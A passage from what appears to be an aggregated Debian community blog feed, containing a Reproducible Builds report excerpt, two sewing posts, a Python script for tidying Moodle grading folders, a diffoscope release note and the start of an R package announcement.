<li>Enable debugging for <a href="https://www.netbsd.org/">NetBSD</a> reproducibility testing. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/091fa73f1">…</a>]</li>
<li>Use <code class="language-plaintext highlighter-rouge">/usr/bin/du --apparent-size</code> in the Jenkins shell monitor. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/fd54c037d">…</a>]</li>
<li>Revert “reproducible nodes: mark osuosl2 as down”. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/37cc03eef">…</a>]</li>
<li>Thanks again to <a href="https://www.codethink.co.uk/">Codethink</a>, for they have doubled the RAM on our <code class="language-plaintext highlighter-rouge">arm64</code> nodes. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/640c38126">…</a>]</li>
<li>Only set <code class="language-plaintext highlighter-rouge">/proc/$pid/oom_score_adj</code> to -1000 if it has not already been done. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/c99da2ef3">…</a>]</li>
<li>Add the <code class="language-plaintext highlighter-rouge">opemwrt-target-tegra</code> and <code class="language-plaintext highlighter-rouge">jtx</code> task to the list of zombie jobs. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/e3b188dff">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7fbed0735">…</a>]</li>
</ul>
</li>
</ul>
<p>Vagrant Cascadian also made the following changes:</p>
<ul>
<li>Overhaul the handling of <a href="https://www.openssh.com/">OpenSSH</a> configuration files after updating from Debian <em>bookworm</em>. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/3e58ee08c">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7d8a99cb5">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/5484a9db0">…</a>]</li>
<li>Add two new <code class="language-plaintext highlighter-rouge">armhf</code> architecture build nodes, <code class="language-plaintext highlighter-rouge">virt32z</code> and <code class="language-plaintext highlighter-rouge">virt64z</code>, and insert them into the <a href="https://munin-monitoring.org/">Munin monitoring</a>. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/8700924ae">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/2c462cc3c">…</a>] [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7feece465">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/6159ad4f9">…</a>]</li>
</ul>
<p>In addition, Alexander Couzens updated the <a href="https://openwrt.org/">OpenWrt</a> configuration in order to replace the <code class="language-plaintext highlighter-rouge">tegra</code> target with <code class="language-plaintext highlighter-rouge">mpc85xx</code> [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/b5b63be56">…</a>], Jan-Benedict Glaw updated the <a href="https://www.netbsd.org/">NetBSD</a> build script to use a separate <code class="language-plaintext highlighter-rouge">$TMPDIR</code> to mitigate out of space issues on a <a href="https://en.wikipedia.org/wiki/Tmpfs">tmpfs</a>-backed <code class="language-plaintext highlighter-rouge">/tmp</code> [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/910b83f88">…</a>] and Zheng Junjie added a link to the <a href="https://guix.gnu.org/">GNU Guix</a> tests [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/57b21155e">…</a>].</p>
<p>Lastly, node maintenance was performed by Holger Levsen [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/01ecc9495">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/2f650ed98">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/20e9e5c64">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/9ce43116c">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/9a37e768d">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/b7417a2f8">…</a>] and Vagrant Cascadian [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/a2315e19f">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/aa7579a92">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/c78087b27">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/5b9d95648">…</a>].</p>
<p><br /></p>
<h3 id="upstream-patches">Upstream patches</h3>
<p>The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:</p>
<ul>
<li>
<p>Philip Rinn:</p>
<ul>
<li><a href="https://github.com/manisandro/gImageReader/pull/667"><code class="language-plaintext highlighter-rouge">gimagereader</code></a> (date)</li>
</ul>
</li>
<li>
<p>Bernhard M. Wiedemann:</p>
<ul>
<li><a href="https://github.com/OSGeo/grass/pull/3417"><code class="language-plaintext highlighter-rouge">grass</code></a> (date-related issue)</li>
<li><a href="https://build.opensuse.org/request/show/1144993"><code class="language-plaintext highlighter-rouge">grub2</code></a> (filesystem ordering issue)</li>
<li><a href="https://build.opensuse.org/request/show/1150775"><code class="language-plaintext highlighter-rouge">latex2html</code></a> (drop a non-deterministic log)</li>
<li><a href="https://github.com/markh794/mhvtl/pull/128"><code class="language-plaintext highlighter-rouge">mhvtl</code></a> (tar)</li>
<li><a href="https://github.com/openSUSE/obs-build/issues/980"><code class="language-plaintext highlighter-rouge">obs</code></a> (build-tool issue)</li>
<li><a href="https://github.com/ollama/ollama/pull/2836"><code class="language-plaintext highlighter-rouge">ollama</code></a> (GZip embedding the modification time)</li>
<li><a href="https://github.com/mfontanini/presenterm/pull/202"><code class="language-plaintext highlighter-rouge">presenterm</code></a> (filesystem-ordering issue)</li>
<li><a href="https://bugreports.qt.io/browse/QTBUG-122722"><code class="language-plaintext highlighter-rouge">qt6-quick3d</code></a> (parallelism)</li>
</ul>
</li>
<li>
<p>Chris Lamb:</p>
<ul>
<li><a href="https://bugs.debian.org/1064506">#1064506</a> filed against <a href="https://tracker.debian.org/pkg/geophar"><code class="language-plaintext highlighter-rouge">geophar</code></a>.</li>
<li><a href="https://bugs.debian.org/1064891">#1064891</a> filed against <a href="https://tracker.debian.org/pkg/pytest-repeat"><code class="language-plaintext highlighter-rouge">pytest-repeat</code></a>.</li>
<li><a href="https://bugs.debian.org/1064892">#1064892</a> filed against <a href="https://tracker.debian.org/pkg/klepto"><code class="language-plaintext highlighter-rouge">klepto</code></a>.</li>
</ul>
</li>
<li>
<p>James Addison:</p>
<ul>
<li><a href="https://bugs.debian.org/1064519">#1064519</a> filed against <a href="https://tracker.debian.org/pkg/flask-limiter"><code class="language-plaintext highlighter-rouge">flask-limiter</code></a>.</li>
<li><a href="https://bugs.debian.org/1063542"><code class="language-plaintext highlighter-rouge">python-parsl-doc</code></a> (disable dynamic argument evaluation by Sphinx <code class="language-plaintext highlighter-rouge">autodoc</code> extension)</li>
<li><a href="https://bugs.debian.org/1064891"><code class="language-plaintext highlighter-rouge">python3-pytest-repeat</code></a> (remove <code class="language-plaintext highlighter-rouge">entry_points.txt</code> creation that varied by shell)</li>
<li><a href="https://bugs.debian.org/1064894"><code class="language-plaintext highlighter-rouge">python3-selinux</code></a> (remove packaged <code class="language-plaintext highlighter-rouge">direct_url.json</code> file that embeds build path)</li>
<li><a href="https://bugs.debian.org/1064895"><code class="language-plaintext highlighter-rouge">python3-sepolicy</code></a> (remove packaged <code class="language-plaintext highlighter-rouge">direct_url.json</code> file that embeds build path)</li>
<li><a href="https://bugs.debian.org/1064575">#1064575</a> filed against <a href="https://tracker.debian.org/pkg/pyswarms"><code class="language-plaintext highlighter-rouge">pyswarms</code></a>.</li>
<li><a href="https://bugs.debian.org/1064638">#1064638</a> filed against <a href="https://tracker.debian.org/pkg/python-x2go"><code class="language-plaintext highlighter-rouge">python-x2go</code></a>.</li>
<li><a href="https://bugs.debian.org/1064404"><code class="language-plaintext highlighter-rouge">snapd</code></a> (fix timestamp header in packaged manual-page)</li>
<li><a href="https://bugs.debian.org/1042955"><code class="language-plaintext highlighter-rouge">zzzeeksphinx</code></a> (existing RB patch forwarded and merged (with modifications))</li>
</ul>
</li>
<li>
<p>Johannes Schauer Marin Rodrigues:</p>
<ul>
<li><a href="https://bugs.debian.org/1063939">#1063939</a> filed against <a href="https://tracker.debian.org/pkg/fop"><code class="language-plaintext highlighter-rouge">fop</code></a>.</li>
</ul>
</li>
</ul>
<p><br /></p>
<hr />
<p>If you are interested in contributing to the Reproducible Builds project, please visit our <a href="https://reproducible-builds.org/contribute/"><em>Contribute</em></a> page on our website. However, you can get in touch with us via:</p>
<ul>
<li>
<p>IRC: <code class="language-plaintext highlighter-rouge">#reproducible-builds</code> on <code class="language-plaintext highlighter-rouge">irc.oftc.net</code>.</p>
</li>
<li>
<p>Twitter: <a href="https://twitter.com/ReproBuilds">@ReproBuilds</a></p>
</li>
<li>
<p>Mastodon: <a href="https://fosstodon.org/@reproducible_builds">@reproducible_builds@fosstodon.org</a></p>
</li>
<li>
<p>Mailing list: <a href="https://lists.reproducible-builds.org/listinfo/rb-general"><code class="language-plaintext highlighter-rouge">rb-general@lists.reproducible-builds.org</code></a></p>
</li>
</ul>Reproducible Buildshttps://reproducible-builds.org/blog/Elastic Neck Top Two: MOAR Ruffleshttps://blog.trueelena.org/blog/2024/03/09-elastic_neck_top_two_moar_ruffles/index.html2024-03-09T00:00:00+00:00<article>
<section class="header">
Posted on March 9, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Asewing.html" title="All pages tagged 'craft:sewing'.">craft:sewing</a>, <a href="https://blog.trueelena.org/tags/FreeSoftWear.html" title="All pages tagged 'FreeSoftWear'.">FreeSoftWear</a>
</section>
<section>
<p><img alt="A woman wearing a white top with a wide neck with ruffles and puffy sleeves that are gathered at the cuff. The top is tucked in the trousers to gather the fullness at the waist." class="align-center" src="https://blog.trueelena.org/blog/2024/03/09-elastic_neck_top_two_moar_ruffles/jeans_and_elastic_top.jpg" style="width: 80.0%;" /></p>
<p>After making my <a href="https://blog.trueelena.org/blog/2023/07/26-elastic_neck_top/index.html">Elastic Neck Top</a>
I knew I wanted to make another one less constrained by the amount of
available fabric.</p>
<p>I had a big cut of white cotton voile, I bought some more swimsuit
elastic, and I also had a spool of n°100 sewing cotton, but then I
postponed the project for a while I was working on other things.</p>
<p>Then FOSDEM 2024 arrived, I was going to remote it, and I was working on
my <a href="https://www.scrooppatterns.com/products/augusta-stays-1775-1789">Augusta Stays</a>, but
I knew that in the middle of FOSDEM I risked getting to the stage where
I needed to leave the computer to try the stays on: not something really
compatible with the frenetic pace of a FOSDEM weekend, even one spent at
home.</p>
<p>I needed a backup project<a class="footnote-ref" href="https://blog.trueelena.org#fn1" id="fnref1"><sup>1</sup></a>, and this was perfect: I already
had everything I needed, the pattern and instructions were already on my
site (so I didn’t need to take pictures while working), and it was
mostly a lot of straight seams, perfect while watching conference
videos.</p>
<p>So, on the Friday before FOSDEM I cut all of the pieces, then spent
three quarters of FOSDEM on the stays, and when I reached the point
where I needed to stop for a fit test I started on the top.</p>
<p>Like the first one, everything was sewn by hand, and one week after I
had started everything was assembled, except for the casings for the
elastic at the neck and cuffs, which required about 10 km of sewing, and
even if it was just a running stitch it made me want to reconsider my
lifestyle choices a few times: there was really <em>no</em> reason for me not
to do just those seams by machine in a few minutes.</p>
<p>Instead I kept sewing by hand whenever I had time for it, and on the
next weekend it was ready. We had a rare day of sun during the weekend,
so I wore my thermal underwear, some other layer, a scarf around my
neck, and went outside with my SO to have a batch of pictures taken
(those in the jeans posts, and others for a post I haven’t written yet.
Have I mentioned I have a backlog?).</p>
<p>And then the top went into the wardrobe, and it will come out again when
the weather will be a bit warmer. Or maybe it will be used under the
Augusta Stays, since I don’t have a 1700 chemise yet, but that requires
actually finishing them.</p>
<p><a href="https://sewing-patterns.trueelena.org/contemporary_unisex/tops/low_waste_elastic_neck_top/index.html">The pattern for this project was already online</a>,
of course, but I’ve added a picture of the casing to the relevant
section, and everything is as usual #FreeSoftWear.</p>
<section class="footnotes footnotes-end-of-document">
<hr />
<ol>
<li id="fn1"><p>yes, I could have worked on some knitting WIP, but lately
I’m more in a sewing mood.<a class="footnote-back" href="https://blog.trueelena.org#fnref1">↩︎</a></p></li>
</ol>
</section>
</section>
</article>Elena “of Valhalla”https://blog.trueelena.orgActs of active procrastination: example of a silly Python script for Moodletag:veronneau.org,2024-03-09:/acts-of-active-procrastination-example-of-a-silly-python-script-for-moodle.html2024-03-08T23:15:36+00:00<p>My brain is currently suffering from an overload caused by grading student
assignments.</p>
<p>In search of a somewhat productive way to procrastinate, I thought I
would share a small script I wrote sometime in 2023 to facilitate my grading
work.</p>
<p>I use Moodle for all the classes I teach and students use it to hand me out
their papers. When I'm ready to grade them, I download the ZIP archive Moodle
provides containing all their PDF files and comment them <a href="https://veronneau.org/grading-using-the-wacom-intuos-s.html">using xournalpp and
my Wacom tablet</a>.</p>
<p>Once this is done, I have a directory structure that looks like this:</p>
<pre>Assignment FooBar/
├── Student A_21100_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student A's perfectly named assignment.pdf
│ └── Student A's perfectly named assignment.xopp
├── Student B_21094_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student B's perfectly named assignment.pdf
│ └── Student B's perfectly named assignment.xopp
├── Student C_21093_assignsubmission_file
│ ├── graded paper.pdf
│ ├── Student C's perfectly named assignment.pdf
│ └── Student C's perfectly named assignment.xopp
⋮
</pre>
<p>Before I can upload files back to Moodle, this directory needs to be copied (I
have to keep the original files), cleaned of everything but the <code>graded
paper.pdf</code> files and compressed in a ZIP.</p>
<p>You can see how this can quickly get tedious to do by hand. Not being a
<em>complete</em> tool, I often resorted to crafting a few spurious shell one-liners
each time I had to do this<sup id="fnref:oneliner"><a class="footnote-ref" href="https://veronneau.org/feeds/languages/en.atom.xml#fn:oneliner">1</a></sup>. Eventually I got tired of <code>ctrl-R</code>-ing my
shell history and wrote something reusable.</p>
<p>Behold this script! When I began writing this post, I was certain I had cheaped
out on my 2021 New Year's resolution and written it in Shell, but glory!, it
seems I used a proper scripting language instead.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python3</span>
<span class="c1"># Copyright (C) 2023, Louis-Philippe Véronneau <pollo@debian.org></span>
<span class="c1">#</span>
<span class="c1"># This program is free software: you can redistribute it and/or modify</span>
<span class="c1"># it under the terms of the GNU General Public License as published by</span>
<span class="c1"># the Free Software Foundation, either version 3 of the License, or</span>
<span class="c1"># (at your option) any later version.</span>
<span class="c1">#</span>
<span class="c1"># This program is distributed in the hope that it will be useful,</span>
<span class="c1"># but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="c1"># MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<span class="c1"># GNU General Public License for more details.</span>
<span class="c1">#</span>
<span class="c1"># You should have received a copy of the GNU General Public License</span>
<span class="c1"># along with this program. If not, see <http://www.gnu.org/licenses/>.</span>
<span class="sd">"""</span>
<span class="sd">This script aims to take a directory containing PDF files exported via the</span>
<span class="sd">Moodle mass download function, remove everything but the final files to submit</span>
<span class="sd">back to the students and zip it back.</span>
<span class="sd">usage: ./moodle-zip.py <target_dir></span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">shutil</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">tempfile</span>
<span class="kn">from</span> <span class="nn">fnmatch</span> <span class="kn">import</span> <span class="n">fnmatch</span>
<span class="k">def</span> <span class="nf">sanity</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Run sanity checks before doing anything else"""</span>
<span class="n">base_directory</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">normpath</span><span class="p">(</span><span class="n">directory</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">isdir</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Target directory </span><span class="si">{</span><span class="n">directory</span><span class="si">}</span><span class="s2"> is not a valid directory"</span><span class="p">)</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="sa">f</span><span class="s2">"/tmp/</span><span class="si">{</span><span class="n">base_directory</span><span class="si">}</span><span class="s2">.zip"</span><span class="p">):</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Final ZIP file path '/tmp/</span><span class="si">{</span><span class="n">base_directory</span><span class="si">}</span><span class="s2">.zip' already exists"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">dirnames</span><span class="p">,</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="k">for</span> <span class="n">dirname</span> <span class="ow">in</span> <span class="n">dirnames</span><span class="p">:</span>
<span class="n">corrige_present</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">dirname</span><span class="p">)):</span>
<span class="k">if</span> <span class="n">fnmatch</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s1">'graded paper.pdf'</span><span class="p">):</span>
<span class="n">corrige_present</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">corrige_present</span> <span class="ow">is</span> <span class="kc">False</span><span class="p">:</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Directory </span><span class="si">{</span><span class="n">dirname</span><span class="si">}</span><span class="s2"> does not contain a 'graded paper.pdf' file"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">clean</span><span class="p">(</span><span class="n">directory</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Remove superfluous files, to keep only the graded PDF"""</span>
<span class="k">with</span> <span class="n">tempfile</span><span class="o">.</span><span class="n">TemporaryDirectory</span><span class="p">()</span> <span class="k">as</span> <span class="n">tmp_dir</span><span class="p">:</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">copytree</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">tmp_dir</span><span class="p">,</span> <span class="n">dirs_exist_ok</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">tmp_dir</span><span class="p">):</span>
<span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">fnmatch</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s1">'graded paper.pdf'</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">file</span><span class="p">))</span>
<span class="n">compress</span><span class="p">(</span><span class="n">tmp_dir</span><span class="p">,</span> <span class="n">directory</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">compress</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">target_dir</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Compress directory into a ZIP file and save it to the target dir"""</span>
<span class="n">target_dir</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">normpath</span><span class="p">(</span><span class="n">target_dir</span><span class="p">))</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">make_archive</span><span class="p">(</span><span class="sa">f</span><span class="s2">"/tmp/</span><span class="si">{</span><span class="n">target_dir</span><span class="si">}</span><span class="s2">"</span><span class="p">,</span> <span class="s1">'zip'</span><span class="p">,</span> <span class="n">directory</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Final ZIP file has been saved to '/tmp/</span><span class="si">{</span><span class="n">target_dir</span><span class="si">}</span><span class="s2">.zip'"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="w"> </span><span class="sd">"""Main function"""</span>
<span class="n">target_dir</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">sanity</span><span class="p">(</span><span class="n">target_dir</span><span class="p">)</span>
<span class="n">clean</span><span class="p">(</span><span class="n">target_dir</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>If for some reason you happen to have a similar workflow as I and end up using
this script, hit me up?</p>
<p>Now, back to grading...</p>
<div class="footnote">
<hr />
<ol>
<li id="fn:oneliner">
<p>If I recall correctly, the lazy way I used to do it involved
copying the directory, renaming the extension of the <code>graded paper.pdf</code>
files, deleting all <code>.pdf</code> and <code>.xopp</code> files using <code>find</code> and changing
<code>graded paper.foobar</code> back to a PDF. Some clever regex or learning <code>awk</code>
from the ground up could've probably done the job as well, but you know,
that would have required using my brain and <a href="https://debconf17.debconf.org/talks/92/">spending spoons</a>... <a class="footnote-backref" href="https://veronneau.org/feeds/languages/en.atom.xml#fnref:oneliner" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>Louis-Philippe Véronneauhttps://veronneau.org/diffoscope 260 releasedhttps://diffoscope.org/news/diffoscope-260-released/2024-03-08T00:00:00+00:00<p>The diffoscope maintainers are pleased to announce the release of diffoscope
version <code class="language-plaintext highlighter-rouge">260</code>. This version includes the following changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ Chris Lamb ]
* Actually test 7z support in the test_7z set of tests, not the lz4
functionality. (Closes: reproducible-builds/diffoscope#359)
* In addition, correctly check for the 7z binary being available
(and not lz4) when testing 7z.
* Prevent a traceback when comparing a contentful .pyc file with an
empty one. (Re: Debian:#1064973)
</code></pre></div></div>
<p>You find out more by <a href="https://diffoscope.org">visiting the project homepage</a>.</p>Reproducible Builds (diffoscope)https://diffoscope.org/Denim Waistcoathttps://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/index.html2024-03-08T00:00:00+00:00<article>
<section class="header">
Posted on March 8, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Asewing.html" title="All pages tagged 'craft:sewing'.">craft:sewing</a>, <a href="https://blog.trueelena.org/tags/FreeSoftWear.html" title="All pages tagged 'FreeSoftWear'.">FreeSoftWear</a>
</section>
<section>
<p><img alt="A woman wearing a single breasted waistcoat with double darts at the waist, two pocket flaps at the waist and one on the left upper breast. It has four jeans buttons." class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/denim_waistcoat.jpg" style="width: 80.0%;" /></p>
<p>I had finished sewing my jeans, I had a scant 50 cm of elastic denim
left.</p>
<p>Unrelated to that, I had just finished drafting a vest with Valentina,
after <a href="https://sewing-patterns.trueelena.org/historical_womenswear/drafting_methods/cutters/index.html#vest">the Cutters’ Practical Guide to the Cutting of Ladies Garments</a>.</p>
<p>A new pattern requires a (wearable) mockup. 50 cm of leftover fabric
require a quick project. The decision didn’t take a lot of time.</p>
<p>As a mockup, I kept things easy: single layer with no lining, some edges
finished with a topstitched hem and some with bias tape, and plain tape
on the fronts, to give more support to the buttons and buttonholes.</p>
<p>I did add pockets: not real welt ones (too much effort on denim), but
simple slits covered by flaps.</p>
<p><img alt="a rectangle of pocketing fabric on the wrong side of a denim" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/pocket_slit.jpg" style="width: 80.0%;" /></p>
<blockquote>
<p>piece; there is a slit in the middle that has been finished with
topstitching.</p>
</blockquote>
<p>To do them I marked the slits, then I cut two rectangles of pocketing
fabric that should have been as wide as the slit + 1.5 cm (width of the
pocket) + 3 cm (allowances) and twice the sum of as tall as I wanted the
pocket to be plus 1 cm (space above the slit) + 1.5 cm (allowances).</p>
<p>Then I put the rectangle on the right side of the denim, aligned so that
the top edge was 2.5 cm above the slit, sewed 2 mm from the slit, cut,
turned the pocketing to the wrong side, pressed and topstitched 2 mm
from the fold to finish the slit.</p>
<p><img alt="a piece of pocketing fabric folded in half and sewn on all 3" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/pocket_first_seam.jpg" style="width: 80.0%;" /></p>
<blockquote>
<p>other sides; it does not lay flat on the right side of the fabric
because the finished slit (hidden in the picture) is pulling it.</p>
</blockquote>
<p>Then I turned the pocketing back to the right side, folded it in half,
sewed the side and top seams with a small allowance, pressed and turned
it again to the wrong side, where I sewed the seams again to make a
french seam.</p>
<p>And finally, a simple rectangular denim flap was topstitched to the
front, covering the slits.</p>
<p>I wasn’t as precise as I should have been and the pockets aren’t exactly
the right size, but they will do to see if I got the positions right (I
think that the breast one should be a cm or so lower, the waist ones are
fine), and of course they are tiny, but that’s to be expected from a
waistcoat.</p>
<p><img alt="The back of the waistcoat," class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/waistcoat_back.jpg" style="width: 80.0%;" /></p>
<p>The other thing that wasn’t exactly as expected is the back: the pattern
splits the bottom part of the back to give it “sufficient spring over
the hips”. The book is probably published in 1892, but I had already
found when drafting the foundation skirt that its idea of “hips”
includes a bit of structure. The “enough steel to carry a book or a cup
of tea” kind of structure. I should have expected <em>a lot</em> of spring, and
indeed that’s what I got.</p>
<p>To fit the bottom part of the back on the limited amount of fabric I had
to piece it, and I suspect that the flat felled seam in the center is
helping it sticking out; I don’t think it’s exactly <em>bad</em>, but it is
a <em>peculiar</em> look.</p>
<p>Also, I had to cut the back on the fold, rather than having a seam in
the middle and the grain on a different angle.</p>
<p>Anyway, my next waistcoat project is going to have a linen-cotton lining
and silk fashion fabric, and I’d say that the pattern is good enough
that I can do a few small fixes and cut it directly in the lining, using
it as a second mockup.</p>
<p>As for the wrinkles, there is quite a bit, but it looks something that
will be solved by a bit of lightweight boning in the side seams and in
the front; it will be seen in the second mockup and the finished
waistcoat.</p>
<p>As for this one, it’s definitely going to get some wear as is, in casual
contexts. Except. Well, it’s a denim waistcoat, right? With a very
different cut from the “get a denim jacket and rip out the sleeves”, but
still a denim waistcoat, right? The kind that you cover in patches,
right?</p>
<p><img alt="Outline of a sewing machine with teeth and crossed bones below it, and the text “home sewing is killing fashion / and it's illegal”" class="align-center" src="https://blog.trueelena.org/blog/2024/03/08-denim_waistcoat/Homesewing.svg" style="width: 80.0%;" /></p>
<p>And I may have screenprinted a “home sewing is killing fashion” patch
some time ago, using <a href="https://commons.wikimedia.org/wiki/File:Homesewing.svg">the SVG from wikimedia commons</a> / the <a href="https://en.wikipedia.org/wiki/Home_Taping_Is_Killing_Music">Home
Taping is Killing Music</a> page.</p>
<p>And. Maybe I’ll wait until I have finished the real waistcoat. But I
suspect that one, and other sewing / costuming patches may happen in the
future.</p>
<p>No regrets, as the words on my seam ripper pin say, right? :D</p>
</section>
</article>Elena “of Valhalla”https://blog.trueelena.orgprrd 0.0.6 at CRAN: Several Improvementshttp://dirk.eddelbuettel.com/blog/2024/03/07#prrd_0.0.62024-03-07T23:05:00+00:00<p>Thrilled to share that a new version of <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> arrived at
<a href="https://cran.r-project.org">CRAN</a> yesterday in a first
update in two and a half years. <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> facilitates
the <em>parallel running [of] reverse dependency [checks]</em> when
preparing R packages. It is used extensively for releases I make of <a href="https://www.rcpp.org">Rcpp</a>, <a href="https://dirk.eddelbuettel.com/code/rcpp.armadillo.html">RcppArmadillo</a>,
<a href="https://dirk.eddelbuettel.com/code/rcpp.eigen.html">RcppEigen</a>,
<a href="https://dirk.eddelbuettel.com/code/bh.html">BH</a>, and
others.</p>
<p><img alt="prrd screenshot image" src="https://github.com/eddelbuettel/prrd/raw/master/local/screenshot_prrd_rcpparmadillo.png" style="float: left; margin: 10px 10px 10px 0;" width="700" /></p>
<p>The key idea of <a href="https://dirk.eddelbuettel.com/code/prrd.html">prrd</a> is simple,
and described in some more detail on <a href="https://dirk.eddelbuettel.com/code/prrd.html">its webpage</a> and
its <a href="https://github.com/eddelbuettel/prrd">GitHub repo</a>.
Reverse dependency checks are an important part of package development
that is easily done in a (serial) loop. But these checks are also
generally <em>embarassingly parallel</em> as there is no or little
interdependency between them (besides maybe shared build depedencies).
See the (dated) screenshot (running six parallel workers, arranged in a
split <a href="https://byobu.org">byobu</a> session).</p>
